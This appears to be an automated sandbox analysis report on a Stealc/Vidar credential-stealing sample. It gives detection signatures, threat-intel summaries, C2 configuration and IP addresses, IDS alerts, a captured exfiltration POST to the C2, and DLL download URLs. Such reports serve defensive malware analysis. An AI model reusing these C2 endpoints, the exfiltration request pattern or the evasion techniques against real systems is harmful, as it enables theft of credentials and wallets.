Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1525214
MD5:	894a16433a404abfcfe2097300da90ef
SHA1:	42ee9cdeb881344b5d833b443c7ef292156b897b
SHA256:	51561818e5a753c118dd3d88b3682894b5c7dafbba301aa68ce0666f5e6f5219
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5008 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 894A16433A404ABFCFE2097300DA90EF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2054617135.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 5008	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5008	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 5008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5008	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.340000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:04.187170+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:04.180986+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:04.417603+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:05.533103+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:04.425772+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:03.948006+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T21:36:06.175790+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:11.163004+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:12.229705+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:13.406008+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:13.942122+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:15.618872+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:16.158768+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 34 46 46 30 36 35 32 45 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="hwid"B04FF0652E061437788654------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build"doma------KFIDAFBFBKFHJJKEHIEG--

Source: file.exe, 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll)
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll?Z
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll;
Source: file.exe, 00000000.00000002.2281603796.0000000001395000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2281603796.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlli
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllgZ#i
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4Nhh
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8Nth
Source: file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpMSnh
Source: file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdowsApps
Source: file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpge
Source: file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpseVSCho
Source: file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpxO
Source: file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37b
Source: file.exe, 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2307918944.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2220567485.000000002FBC9000.00000004.00000020.00020000.00000000.sdmp, HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2220567485.000000002FBC9000.00000004.00000020.00020000.00000000.sdmp, HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2220567485.000000002FBC9000.00000004.00000020.00020000.00000000.sdmp, HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6AB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6AB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6AB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C64F280

